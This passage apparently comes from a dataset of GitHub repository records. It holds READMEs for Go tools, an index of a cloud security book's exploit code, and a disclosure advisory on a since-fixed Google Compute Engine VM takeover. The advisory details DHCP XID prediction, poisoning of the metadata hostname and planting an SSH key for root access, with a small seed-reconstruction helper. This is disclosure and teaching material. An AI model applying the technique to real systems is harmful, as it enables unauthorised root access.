\n\nSame code but using a configuration file:\n\n```go\n$ cat > gopher.conf\nage 3\n\n$ go run gopher.go -config gopher.conf\nage: 3\n```\n\nThe following table shows how flags are translated to environment variables and configuration files:\n\n| Type | Flag | Environment | File |\n| ------ | :------------ |:------------ |:------------ |\n| int | -age 2 | AGE=2 | age 2 |\n| bool | -female | FEMALE=true | female true |\n| float | -length 175.5 | LENGTH=175.5 | length 175.5 |\n| string | -name Gloria | NAME=Gloria | name Gloria |\n\nThis package is a port of Go's [flag][] package from the standard library with the addition of two functions `ParseEnv` and `ParseFile`.\n\n[flag]: http://golang.org/src/pkg/flag\n\n\nGoals\n-----\n\n- Compatability with the original `flag` package\n- Support the [twelve-factor app methodology][]\n- Uniform user experience between the three input methods\n\n\nWhy?\n---\n\nWhy not use one of the many INI, JSON or YAML parsers?\n\nI find it best practice to have simple configuration options to control the behaviour of an applications when it starts up. Use basic types like ints, floats and strings for configuration options and store more complex data structures in the \"datastore\" layer.\n\n\nUsage\n---\n\nIt's intended for projects which require a simple configuration made available through command-line flags, configuration files and shell environments. It's similar to the original `flag` package.\n\nExample:\n\n```go\nimport \"github.com/namsral/flag\"\n\nflag.String(flag.DefaultConfigFlagname, \"\", \"path to config file\")\nflag.Int(\"age\", 24, \"help message for age\")\n\nflag.Parse()\n```\n\nOrder of precedence:\n\n1. Command line options\n2. Environment variables\n3. Configuration file\n4. 
Default values\n\n\n#### Parsing Configuration Files\n\nCreate a configuration file:\n\n```go\n$ cat > ./gopher.conf\n# empty newlines and lines beginning with a \"#\" character are ignored.\nname bob\n\n# keys and values can also be separated by the \"=\" character\nage=20\n\n# booleans can be empty, set with 0, 1, true, false, etc\nhacker\n```\n\nAdd a \"config\" flag:\n\n```go\nflag.String(flag.DefaultConfigFlagname, \"\", \"path to config file\")\n```\n\nRun the command:\n\n```go\n$ go run ./gopher.go -config ./gopher.conf\n```\n\nThe default flag name for the configuration file is \"config\" and can be changed\nby setting `flag.DefaultConfigFlagname`:\n\n```go\nflag.DefaultConfigFlagname = \"conf\"\nflag.Parse()\n```\n\n#### Parsing Environment Variables\n\nEnvironment variables are parsed 1-on-1 with defined flags:\n\n```go\n$ export AGE=44\n$ go run ./gopher.go\nage=44\n```\n\n\nYou can also parse prefixed environment variables by setting a prefix name when creating a new empty flag set:\n\n```go\nfs := flag.NewFlagSetWithEnvPrefix(os.Args[0], \"GO\", 0)\nfs.Int(\"age\", 24, \"help message for age\")\nfs.Parse(os.Args[1:])\n...\n$ go export GO_AGE=33\n$ go run ./gopher.go\nage=33\n```\n\n\nFor more examples see the [examples][] directory in the project repository.\n\n[examples]: https://github.com/namsral/flag/tree/master/examples\n\nThat's it.\n\n\nLicense\n---\n\n\nCopyright (c) 2012 The Go Authors. All rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are\nmet:\n\n * Redistributions of source code must retain the above copyright\nnotice, this list of conditions and the following disclaimer.\n * Redistributions in binary form must reproduce the above\ncopyright notice, this list of conditions and the following disclaimer\nin the documentation and/or other materials provided with the\ndistribution.\n * Neither the name of Google Inc. nor the names of its\ncontributors may be used to endorse or promote products derived from\nthis software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n\"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\nLIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\nA PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT\nOWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\nLIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\nDATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\nTHEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "alexkohler/prealloc", "link": "https://github.com/alexkohler/prealloc", "tags": ["golang", "go", "static-code-analysis", "static-analyzer", "static-analysis", "prealloc-suggestions", "slice"], "stars": 520, "description": "prealloc is a Go static analysis tool to find slice declarations that could potentially be preallocated.", "lang": "Go", "repo_lang": "", "readme": "# prealloc\n\nprealloc is a Go static analysis tool to find slice declarations that could potentially be preallocated.\n\n## Installation\n\n go get -u github.com/alexkohler/prealloc\n\n## Usage\n\nSimilar to other Go static analysis tools (such as golint, go vet), prealloc can be invoked with one or more filenames, directories, or packages named by its import path. Prealloc also supports the `...` wildcard.\n\n prealloc [flags] files/directories/packages\n\n### Flags\n- **-simple** (default true) - Report preallocation suggestions only on simple loops that have no returns/breaks/continues/gotos in them. Setting this to false may increase false positives.\n- **-rangeloops** (default true) - Report preallocation suggestions on range loops.\n- **-forloops** (default false) - Report preallocation suggestions on for loops. This is false by default due to there generally being weirder things happening inside for loops (at least from what I've observed in the Standard Library).\n- **-set_exit_status** (default false) - Set exit status to 1 if any issues are found.\n\n## Purpose\n\nWhile the [Go *does* attempt to avoid reallocation by growing the capacity in advance](https://github.com/golang/go/blob/87e48c5afdcf5e01bb2b7f51b7643e8901f4b7f9/src/runtime/slice.go#L100-L112), this sometimes isn't enough for longer slices. If the size of a slice is known at the time of its creation, it should be specified.\n\nConsider the following benchmark: (this can be found in prealloc_test.go in this repo)\n\n```Go\nimport \"testing\"\n\nfunc BenchmarkNoPreallocate(b *testing.B) {\n\texisting := make([]int64, 10, 10)\n\tb.ResetTimer()\n\tfor i := 0; i < b.N; i++ {\n\t\t// Don't preallocate our initial slice\n\t\tvar init []int64\n\t\tfor _, element := range existing {\n\t\t\tinit = append(init, element)\n\t\t}\n\t}\n}\n\nfunc BenchmarkPreallocate(b *testing.B) {\n\texisting := make([]int64, 10, 10)\n\tb.ResetTimer()\n\tfor i := 0; i < b.N; i++ {\n\t\t// Preallocate our initial slice\n\t\tinit := make([]int64, 0, len(existing))\n\t\tfor _, element := range existing {\n\t\t\tinit = append(init, element)\n\t\t}\n\t}\n}\n```\n\n```Bash\n$ go test -bench=. -benchmem\ngoos: linux\ngoarch: amd64\nBenchmarkNoPreallocate-4 \t 3000000\t 510 ns/op\t 248 B/op\t 5 allocs/op\nBenchmarkPreallocate-4 \t20000000\t 111 ns/op\t 80 B/op\t 1 allocs/op\n```\n\nAs you can see, not preallocating can cause a performance hit, primarily due to Go having to reallocate the underlying array. 
The pattern benchmarked above is common in Go: declare a slice, then write some sort of range or for loop that appends or indexes into it. The purpose of this tool is to flag slice/loop declarations like the one in `BenchmarkNoPreallocate`. \n\n## Example\n\nSome examples from the Go 1.9.2 source:\n\n```Bash\n$ prealloc go/src/....\narchive/tar/reader_test.go:854 Consider preallocating ss\narchive/zip/zip_test.go:201 Consider preallocating all\ncmd/api/goapi.go:301 Consider preallocating missing\ncmd/api/goapi.go:476 Consider preallocating files\ncmd/asm/internal/asm/endtoend_test.go:345 Consider preallocating extra\ncmd/cgo/main.go:60 Consider preallocating ks\ncmd/cgo/ast.go:149 Consider preallocating pieces\ncmd/compile/internal/ssa/flagalloc.go:64 Consider preallocating oldSched\ncmd/compile/internal/ssa/regalloc.go:719 Consider preallocating phis\ncmd/compile/internal/ssa/regalloc.go:718 Consider preallocating oldSched\ncmd/compile/internal/ssa/regalloc.go:1674 Consider preallocating oldSched\ncmd/compile/internal/ssa/gen/rulegen.go:145 Consider preallocating ops\ncmd/compile/internal/ssa/gen/rulegen.go:145 Consider preallocating ops\ncmd/dist/build.go:893 Consider preallocating all\ncmd/dist/build.go:1246 Consider preallocating plats\ncmd/dist/build.go:1264 Consider preallocating results\ncmd/dist/buildgo.go:59 Consider preallocating list\ncmd/doc/pkg.go:363 Consider preallocating names\ncmd/fix/typecheck.go:219 Consider preallocating b\ncmd/go/internal/base/path.go:34 Consider preallocating out\ncmd/go/internal/get/get.go:175 Consider preallocating out\ncmd/go/internal/load/pkg.go:1894 Consider preallocating dirent\ncmd/go/internal/work/build.go:2402 Consider preallocating absOfiles\ncmd/go/internal/work/build.go:2731 Consider preallocating absOfiles\ncmd/internal/objfile/pe.go:48 Consider preallocating syms\ncmd/internal/objfile/pe.go:38 Consider preallocating addrs\ncmd/internal/objfile/goobj.go:43 Consider preallocating syms\ncmd/internal/objfile/elf.go:35 Consider preallocating syms\ncmd/link/internal/ld/lib.go:1070 Consider preallocating argv\ncmd/vet/all/main.go:91 Consider preallocating pp\ndatabase/sql/sql.go:66 Consider preallocating list\ndebug/macho/file.go:506 Consider preallocating all\ninternal/trace/order.go:55 Consider preallocating batches\nmime/quotedprintable/reader_test.go:191 Consider preallocating outcomes\nnet/dnsclient_unix_test.go:954 Consider preallocating confLines\nnet/interface_solaris.go:85 Consider preallocating ifat\nnet/interface_linux_test.go:91 Consider preallocating ifmat4\nnet/interface_linux_test.go:100 Consider preallocating ifmat6\nnet/internal/socktest/switch.go:34 Consider preallocating st\nos/os_windows_test.go:766 Consider preallocating args\nruntime/pprof/internal/profile/filter.go:77 Consider preallocating lines\nruntime/pprof/internal/profile/profile.go:554 Consider preallocating names\ntext/template/parse/node.go:189 Consider preallocating decl\n```\n\n```Go\n// cmd/api/goapi.go:301\nvar missing []string\nfor feature := range optionalSet {\n\tmissing = append(missing, feature)\n}\n\n// cmd/fix/typecheck.go:219\nvar b []ast.Expr\nfor _, x := range a {\n\tb = append(b, x)\n}\n\n// net/internal/socktest/switch.go:34\nvar st []Stat\nsw.smu.RLock()\nfor _, s := range sw.stats {\n\tns := *s\n\tst = append(st, ns)\n}\nsw.smu.RUnlock()\n\n// cmd/api/goapi.go:301\nvar missing []string\nfor feature := range optionalSet {\n\tmissing = append(missing, feature)\n}\n```\n\nEven if the size the slice is being preallocated to is small, there's still a 
performance gain to be had in explicitly specifying the capacity rather than leaving it up to `append` to discover that it needs to preallocate. Of course, preallocation doesn't need to be done *everywhere*. This tool's job is just to help suggest places where one should consider preallocating.\n\n## How do I fix prealloc's suggestions?\n\nDuring the declaration of your slice, rather than using the zero value of the slice with `var`, initialize it with Go's built-in `make` function, passing the appropriate type and length. This length will generally be whatever you are ranging over. Fixing the examples from above would look like so:\n\n```Go\n// cmd/api/goapi.go:301\nmissing := make([]string, 0, len(optionalSet))\nfor feature := range optionalSet {\n\tmissing = append(missing, feature)\n}\n\n// cmd/fix/typecheck.go:219\nb := make([]ast.Expr, 0, len(a))\nfor _, x := range a {\n\tb = append(b, x)\n}\n\n// net/internal/socktest/switch.go:34\nst := make([]Stat, 0, len(sw.stats))\nsw.smu.RLock()\nfor _, s := range sw.stats {\n\tns := *s\n\tst = append(st, ns)\n}\nsw.smu.RUnlock()\n\n// cmd/api/goapi.go:301\nmissing := make ([]string, 0, len(optionalSet))\nfor feature := range optionalSet {\n\tmissing = append(missing, feature)\n}\n```\n\nNote: If performance is absolutely critical, it may be more efficient to use `copy` instead of `append` for larger slices. For reference, see the following benchmark:\n```Go\nfunc BenchmarkSize200PreallocateCopy(b *testing.B) {\n\texisting := make([]int64, 200, 200)\n\tb.ResetTimer()\n\tfor i := 0; i < b.N; i++ {\n\t\t// Preallocate our initial slice\n\t\tinit := make([]int64, len(existing))\n\t\tcopy(init, existing)\n\t}\n}\n```\n```\n$ go test -bench=. -benchmem\ngoos: linux\ngoarch: amd64\nBenchmarkSize200NoPreallocate-4 \t 500000\t 3080 ns/op\t 4088 B/op\t 9 allocs/op\nBenchmarkSize200Preallocate-4 \t 1000000\t 1163 ns/op\t 1792 B/op\t 1 allocs/op\nBenchmarkSize200PreallocateCopy-4 \t 2000000\t 807 ns/op\t 1792 B/op\t 1 allocs/op\n```\n\n## TODO\n\n- Configuration on whether or not to run on test files\n- Support for embedded ifs (currently, prealloc will only find breaks/returns/continues/gotos if they are in a single if block, I'd like to expand this to supporting multiple if blocks in the future).\n- Globbing support (e.g. 
prealloc *.go)\n\n\n## Contributing\n\nPull requests welcome!\n\n\n## Other static analysis tools\n\nIf you've enjoyed prealloc, take a look at my other static analysis tools!\n- [nakedret](https://github.com/alexkohler/nakedret) - Finds naked returns.\n- [unimport](https://github.com/alexkohler/unimport) - Finds unnecessary import aliases.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "niemeyer/gopkg", "link": "https://github.com/niemeyer/gopkg", "tags": [], "stars": 520, "description": "Source code for the gopkg.in service.", "lang": "Go", "repo_lang": "", "readme": "# gopkg.in Stable APIs for the Go language\n\nSee [http://gopkg.in](http://gopkg.in).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Metarget/cloud-native-security-book", "link": "https://github.com/Metarget/cloud-native-security-book", "tags": [], "stars": 520, "description": "\u300a\u4e91\u539f\u751f\u5b89\u5168\uff1a\u653b\u9632\u5b9e\u8df5\u4e0e\u4f53\u7cfb\u6784\u5efa\u300b\u8d44\u6599\u4ed3\u5e93", "lang": "Go", "repo_lang": "", "readme": "# \"Cloud native security: offensive and defensive practice and system construction\" data warehouse\n\n


\n\nThis warehouse provides the supplementary materials and accompanying source code of the book \"Cloud Native Security: Offensive and Defense Practice and System Construction\", for interested readers to read and practice in depth.\n\n**All content in this warehouse is for teaching and research use only, and illegal use is strictly prohibited. Violators will be responsible for the consequences! **\n\nRelated links: [Douban](https://book.douban.com/subject/35640762/) | [Jingdong](https://item.jd.com/13495676.html) | [Dangdang](http:// product.dangdang.com/29318802.html)\n\n## Supplementary reading material\n\n- [100_Introduction to Cloud Computing.pdf](appendix/100_Introduction to Cloud Computing.pdf)\n- [101_Code Security.pdf](appendix/101_Code Security.pdf)\n- [200_Container Technology.pdf](appendix/200_Container Technology.pdf)\n- [201_Container Orchestration.pdf](appendix/201_Container Orchestration.pdf)\n- [202_Microservice.pdf](appendix/202_Microservice.pdf)\n- [203_Service Grid.pdf](appendix/203_Service Grid.pdf)\n- [204_DevOps.pdf](appendix/204_DevOps.pdf)\n- [CVE-2017-1002101: Accessing host file system through isolation.pdf](appendix/CVE-2017-1002101: Accessing host file system through isolation.pdf)\n- [CVE-2018-1002103: Remote Code Execution and Virtual Machine Escape.pdf](appendix/CVE-2018-1002103: Remote Code Execution and Virtual Machine Escape.pdf)\n- [CVE-2020-8595: Istio Authentication Bypass.pdf](appendix/CVE-2020-8595: Istio Authentication Bypass.pdf)\n- [Target Experiment: Infiltration Combat in Comprehensive Scenario.pdf](appendix/Target Experiment: Infiltration Combat in Comprehensive Scenario.pdf)\n\n## Accompanying book source code\n\n|Code Directory|Description|Location|\n|:-|:-|:-|\n|[0302-development side attack/02-CVE-2018-15664/symlink_race/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-development side Attack/02-CVE-2018-15664/symlink_race)| CVE-2018-15664 exploit code|Section 3.2.2|\n|[0302-Development side attack/03-CVE-2019-14271/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-Development side attack/ 03-CVE-2019-14271)|CVE-2019-14271 exploit code|Section 3.2.3|\n|[0303-Supply Chain Attack/01-CVE-2019-5021-alpine/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0303-Supply Chain Attack/01-CVE-2019-5021-alpine)|An example of building a vulnerable image based on an Alpine image with a CVE-2019-5021 vulnerability|Section 3.3.1|\n|[0303-Supply Chain Attack/02-CVE-2016-5195-malicious-image/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0303- Supply chain attack/02-CVE-2016-5195-malicious-image)|CVE-2016-5195 exploit image construction example|Section 3.3.2|\n|[0304-runtime attack/01-container escape/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-runtime attack/01-container Escape)|Multiple code snippets for container escape|Section 3.4.1|\n|[0304-Runtime Attack/02-Security Container Escape/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-Runtime Attack/02- Secure Container Escape) | Exploit Code for Secure Container Escape | Section 3.4.2 |\n|[0304-runtime attack/03-resource exhaustion attack/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-runtime attack/ 03-Resource Exhaustion Attack)|Example Code of Resource Exhaustion Attack|Section 3.4.3|\n|[0402-Kubernetes component insecure 
configuration/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0402-Kubernetes component insecure configuration/)|K8s does not Security Configuration Utilization Commands | Section 4.2 |\n|[0403-CVE-2018-1002105/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0403-CVE-2018-1002105)|CVE-2018 -1002105 Exploit Code | Section 4.3 |\n|[0404-K8s Denial of Service Attack/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0404-K8s Denial of Service Attack/)|CVE-2019- Exploit code for 11253 and CVE-2019-9512|Section 4.4|\n|[0405-Cloud native network attack/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0405-Cloud native network attack/)|Cloud native man-in-the-middle attack Network environment simulation and attack code example | Section 4.5 |\n\n## Share and exchange\n\nWelcome to pay attention to the official account of \"NSFOCUS Technology Research Newsletter\". We will continue to output high-quality research results in the frontier field of information security:\n\n![WeChat search for \"NSFOCUS Technology Research Newsletter\"](images/yjtx.png)\n\n## Precautions\n\nSome of the source codes come from other places on the Internet, and are archived together for the convenience of readers. These source codes and \"excerpt sources\" are:\n\n1. [0302-development side attack/02-CVE-2018-15664/symlink_race](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-development side Attack/02-CVE-2018-15664/symlink_race): https://seclists.org/oss-sec/2019/q2/131\n2. [0302-Development side attack/03-CVE-2019-14271/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-Development side attack ): https://unit42.paloaltonetworks.com/docker-patched-the-most-severe-copy-vulnerability-to-date-with-cve-2019-14271/\n3. [0304-runtime attack/01-container escape/CVE-2016-5195/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304- Runtime Attacks/01-Container Escape/CVE-2016-5195): https://github.com/scumjr/dirtycow-vdso\n4. [0304-Runtime Attack/01-Container Escape/CVE-2019-5736/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304- Runtime Attack/01-Container Escape/CVE-2019-5736): https://github.com/Frichetten/CVE-2019-5736-PoC\n\nThe license (License) of the referenced project and code is subject to the original project.\n\nPart of the source code modified by the author is no longer listed here, and the sources of relevant references are given in the book, and interested readers can refer to them.\n\n## Errata and supplementary instructions\n\n### 1st Edition 3rd Printing\n\n#### P44 - 3.3.1 Mirroring Vulnerability Exploitation\n\nSee [issue 8](https://github.com/Metarget/cloud-native-security-book/issues/8) for details.\n\nThe command used to build the image below page 44 is incomplete and lacks the specification of the build directory. The correct command is as follows (note that a `.` is added at the end):\n\n```bash\ndocker build --network=host -t alpine:cve-2019-5021 .\n```\n\nThank you readers [@WAY29](https://github.com/WAY29) points out. We will make corrections in subsequent printings.\n\n#### P42 - 3.2.3 CVE-2019-14271: Loading untrusted dynamic link libraries\n\nSee [issue 7](https://github.com/Metarget/cloud-native-security-book/issues/7) for details.\n\nThanks to reader [@WAY29](https://github.com/WAY29) for pointing this out. 
In order to successfully compile Glibc, the configure operation needs to be performed before make can be performed. We will make corrections in subsequent printings.\n\n#### P42 - 3.2.3 CVE-2019-14271: Loading untrusted dynamic link libraries\n\nSee [issue 6](https://github.com/Metarget/cloud-native-security-book/issues/6) for details.\n\nThanks to reader [@XDTG](https://github.com/XDTG) for pointing this out. There is no problem with the effect of the steps in the book, but the scheme proposed by [@XDTG](https://github.com/XDTG) is more natural and elegant. After verification, we will consider updating the scheme in subsequent printings.\n\n### Edition 1 1st Printing\n\n#### P37 - 3.2.2 CVE-2018-15664: Symbolic link replacement vulnerability (here is a supplementary explanation, the original text is correct)\n\nThe description of the paragraph beginning on the eighth line of the main text is difficult to understand:\n\n> The task of symlink_swap.c is to create a symbolic link pointing to the root directory \"/\" in the container, and constantly exchange the symbolic link (passed in by command line parameters, such as \"/totally_safe_path\") with a normal directory (such as \"/totally_safe_path\") -stashed\") name. In this way, when executing docker cp on the host machine, if it is first checked that \"/totally_safe_path\" is a normal directory, but \"/totally_safe_path\" becomes a symbolic link when the copy operation is performed later, then Docker will be on the host The symbolic link is resolved on the host.\n\nIn fact, inside the container, once the name swapping via renameat2 starts, `/totally_safe_path` and `/totally_safe_path-stashed` are actually just two strings for us, no longer tied to symlinks or normal directories, Only the moment you stop swapping does it re-determine which string points to which (symlink or directory).\n\nTherefore, in the book \"In this way, when executing docker cp on the host, if first...\" here, at this time, the name exchange has already started in the container. What the user (or attacker) wants to go to docker cp is the file or directory named `/totally_safe_path` in the container (meaning \"very safe path\"), which is expected (or the setting of this scenario); During the execution of docker cp, during the inspection phase, the `/totally_safe_path` path string still points to a normal directory, but when it comes to the copy operation, `/totally_safe_path` has been exchanged to point to a symbolic link.\n\nThanks to reader @\u7cd6\u7403\u7403\u739b\u9a6c\u541b for pointing it out.\n\n#### P85 - 4.2.1 Kubernetes API Server unauthorized access (version 1 3rd printing fixed)\n\nThere is an ambiguity in the fourth-to-last line of the text:\n\n> Then the attacker can control the cluster through this port as long as the network is reachable.\n\nIn fact, if you only set `--insecure-port=8080`, then the service is only listening on `localhost`, which is usually inaccessible to remote attackers, even if it is \"network reachable\" from an IP perspective. . If you want remote control, you also need to configure `--insecure-bind-address=0.0.0.0`.\n\nThe \"network reachable\" here actually wants to explain two situations:\n\n1. When adding `--insecure-bind-address`, it is directly accessed by the outside, that is, the above;\n2. Able to access localhost in some way, this scenario also includes:\n 1. Local users use the service on port 8080 to elevate their privileges;\n 2. 
Realize remote access to the localhost port based on methods similar to SSRF and DNS rebinding.", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "irsl/gcp-dhcp-takeover-code-exec", "link": "https://github.com/irsl/gcp-dhcp-takeover-code-exec", "tags": [], "stars": 519, "description": "Google Compute Engine (GCE) VM takeover via DHCP flood - gain root access by getting SSH keys added by google_guest_agent", "lang": "Go", "repo_lang": "", "readme": "# Abstract\r\n\r\nThis was an advisory about an unpatched vulnerability (at time of publishing this repo, 2021-06-25) affecting \r\nvirtual machines in Google's Compute Engine platform. The flaw is fixed by Google since (as of 2021-07-30).\r\nThe technical details below is almost exactly the same as my report sent to the VRP team.\r\n\r\nAttackers could take over virtual machines of the Google Cloud Platform over the network due to weak \r\nrandom numbers used by the ISC DHCP software and an unfortunate combination of additional factors.\r\nThis is done by impersonating the Metadata server from the targeted virtual machine's point of view.\r\nBy mounting this exploit, the attacker can grant access to themselves over SSH (public key authentication) \r\nso then they can login as the root user.\r\n\r\n\r\n# The vulnerability\r\n\r\nISC's implementation of the DHCP client (isc-dhcp-client package on the Debian flavors) relies on\r\nrandom(3) to generate pseudo-random numbers (a nonlinear additive feedback random). \r\nIt is [seeded](https://github.com/isc-projects/dhcp/blob/master/client/dhclient.c) with the srandom function as follows:\r\n\r\n```\r\n\t/* Make up a seed for the random number generator from current\r\n\t time plus the sum of the last four bytes of each\r\n\t interface's hardware address interpreted as an integer.\r\n\t Not much entropy, but we're booting, so we're not likely to\r\n\t find anything better. */\r\n\tseed = 0;\r\n\tfor (ip = interfaces; ip; ip = ip->next) {\r\n\t\tint junk;\r\n\t\tmemcpy(&junk,\r\n\t\t &ip->hw_address.hbuf[ip->hw_address.hlen -\r\n\t\t\t\t\t sizeof seed], sizeof seed);\r\n\t\tseed += junk;\r\n\t}\r\n\tsrandom(seed + cur_time + (unsigned)getpid());\r\n```\r\n\r\nThis effectively consists of 3 components:\r\n\r\n- the current unixtime when the process is started\r\n\r\n- the pid of the dhclient process\r\n\r\n- the sum of the last 4 bytes of the ethernet addresses (MAC) of the network interface cards\r\n\r\nOn the Google Cloud Platform, the virtual machines usually have only 1 NIC, something like this:\r\n\r\n```\r\nroot@test-instance-1:~/isc-dhcp-client/real3# ifconfig\r\nens4: flags=4163 mtu 1460\r\n inet 10.128.0.2 netmask 255.255.255.255 broadcast 10.128.0.2\r\n inet6 fe80::4001:aff:fe80:2 prefixlen 64 scopeid 0x20\r\n ether 42:01:0a:80:00:02 txqueuelen 1000 (Ethernet)\r\n RX packets 1336873 bytes 128485980 (122.5 MiB)\r\n RX errors 0 dropped 0 overruns 0 frame 0\r\n TX packets 5708403 bytes 2012678044 (1.8 GiB)\r\n TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0\r\n```\r\n\r\nNote that the last 4 bytes (`0a:80:00:02`) of the MAC address (`42:01:0a:80:00:02`) are actually the same as \r\nthe internal IP address of the box (`10.128.0.2`). This means, 1 of the 3 components is effectively public.\r\n\r\nThe pid of the dhclient process is predictable. 
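\r\n\r\nAs a quick aside, a minimal Go sketch (hypothetical, not part of the original PoC) shows how that public component of the seed can be reconstructed from nothing but the victim's internal IPv4 address:\r\n\r\n```go\r\npackage main\r\n\r\nimport (\r\n\t\"encoding/binary\"\r\n\t\"fmt\"\r\n\t\"net\"\r\n)\r\n\r\n// macSeedComponent rebuilds the NIC-derived term of dhclient's srandom() seed.\r\n// On GCE the last four bytes of the MAC equal the internal IPv4 address, and\r\n// dhclient memcpy()s those bytes into an int, so on the usual little-endian\r\n// guests the term is simply the IP bytes read as a little-endian uint32.\r\n// (Assumptions: little-endian guest, a single NIC.)\r\nfunc macSeedComponent(internalIP string) uint32 {\r\n\tip := net.ParseIP(internalIP).To4()\r\n\tif ip == nil {\r\n\t\treturn 0\r\n\t}\r\n\treturn binary.LittleEndian.Uint32(ip)\r\n}\r\n\r\nfunc main() {\r\n\t// 10.128.0.2 corresponds to the MAC 42:01:0a:80:00:02 shown above.\r\n\tfmt.Printf(\"seed component: %#x\", macSeedComponent(\"10.128.0.2\"))\r\n}\r\n```\r\n\r\n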
The linux kernel assigns process IDs in a linear way.\r\nI found that the pid varies between 290 and 315 (by rebooting a Debian 10 based VM many times and \r\nchecking the pid), making this component of the seed easily predictable.\r\n\r\nThe unix time component has a more broad domain, but this turns out to be not a practical problem (see later).\r\n\r\nThe firewall/router of GCP blocks broadcast packets sent by VMs, so only the metadata server (169.254.169.254)\r\nreceives them. However, some phases of the DHCP protocol don't rely on broadcasts, and the packets to be sent\r\ncan be easily calculated and sent in advance.\r\n\r\nTo mount this attack, the attacker needs to craft multiple DHCP packets using a set of precalculated/suspected \r\nXIDs and flood the victim's dhclient directly (no broadcasts here). If the XID is correct, the victim machine applies \r\nthe network configuration. This is a race condition, but since the flood is fast and exhaustive, the metadata server \r\nhas no real chance to win.\r\n\r\nAt this point the attacker is in the position of reconfiguring the network stack of the victim.\r\n\r\nGoogle heavily relies on the Metadata server, including the distribution of ssh public keys. \r\nThe connection is secured at the network/routing layer and the server is not authenticated (no TLS, clear \r\nhttp only). The `google_guest_agent` process, that is responsible for processing the responses of the\r\nMetadata server, establishes the connection via the virtual hostname `metadata.google.internal` which\r\nis an alias in the `/etc/hosts` file. This file is managed by `/etc/dhcp/dhclient-exit-hooks.d/google_set_hostname`\r\nas a hook part of the DHCP response processing and the alias is normally added by this script at each \r\nDHCPACK.\r\nBy having full control over DHCP, the Metadata server can be impersonated. This attack has been found and \r\ndocumented by `Chris Moberly`, who inspired my research with his oslogin privesc write up here:\r\n\r\nhttps://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-tech-notes/-/tree/master/oslogin-privesc-june-2020\r\n\r\nThe difference is, flooding of the dhclient process is done remotely in my attack and the XIDs are guessed.\r\n\r\nThe attack consists of 2 phases:\r\n\r\n#1 Instructing the client to set the IP address of the rogue metadata server on the NIC.\r\nNo router is configured. This effectively cuts the internet connection of the box. \r\n`google_guest_agent` can't fall back to connecting the real metadata server.\r\nThis DHCP lease is short lived (15 seconds), so dhclient sends a DHCPREQUEST soon again and starts looking \r\nfor a new DHCPACK. \r\n\r\nSince a new ip address (the rouge metadata server) and new hostname (`metadata.google.com`) is part of this\r\nDHCPACK packet, the `google_set_hostname` function adds two lines like like below (35.209.180.239 is the rouge \r\nmetadata server I used):\r\n\r\n35.209.180.239 metadata.google.internal metadata # Added by Google\r\n169.254.169.254 metadata.google.internal # Added by Google\r\n\r\n\r\nThe attacker is still flooding at this point, and since ARP is not flushed quickly, these packets are \r\nstill delivered.\r\n\r\n#2. Restoring a working network stack, along with the valid router address. This DHCPACK does not contain a hostname,\r\nso `google_set_hostname` won't touch `/etc/hosts`. 
The poisoned `metadata.google.internal` entry remains in there.\r\n\r\nIn case multiple entries are present in the hosts file, the Linux kernel prioritizes the link-local address \r\n(169.254.169.254) lower than the routable ones.\r\n\r\nAt this point `google_guest_agent` can establish a TCP connection to the (rouge) metadata server, where it gets\r\na config that contains the attacker's ssh public key. The entry is populated into `/root/.ssh/authorized_keys`\r\nand the attacker can open a root shell remotely.\r\n\r\n\r\n# Attack scenarios\r\n\r\nAttackers would gain full access to the targeted virtual machines in all attack scenarios below.\r\n\r\n- Attack #1: Targeting a VM on the same subnet (~same project), while it is rebooting.\r\n The attacker needs presence on another host.\r\n\r\n- Attack #2: Targeting a VM on the same subnet (~same project), while it is refreshing the lease (so no reboot is needed).\r\n This takes place every half an hour (1800s), making 48 windows/attempts possible a day. \r\n Since an F class VM has ~170.000 pps (packet per second), and a day of unixtime + potential pids makes ~86420 potential \r\n XIDs, this is a feasible attack vector.\r\n \r\n- Attack #3: Targeting a VM over the internet. This requires the firewall in front of the victim VM to be fully open. \r\n 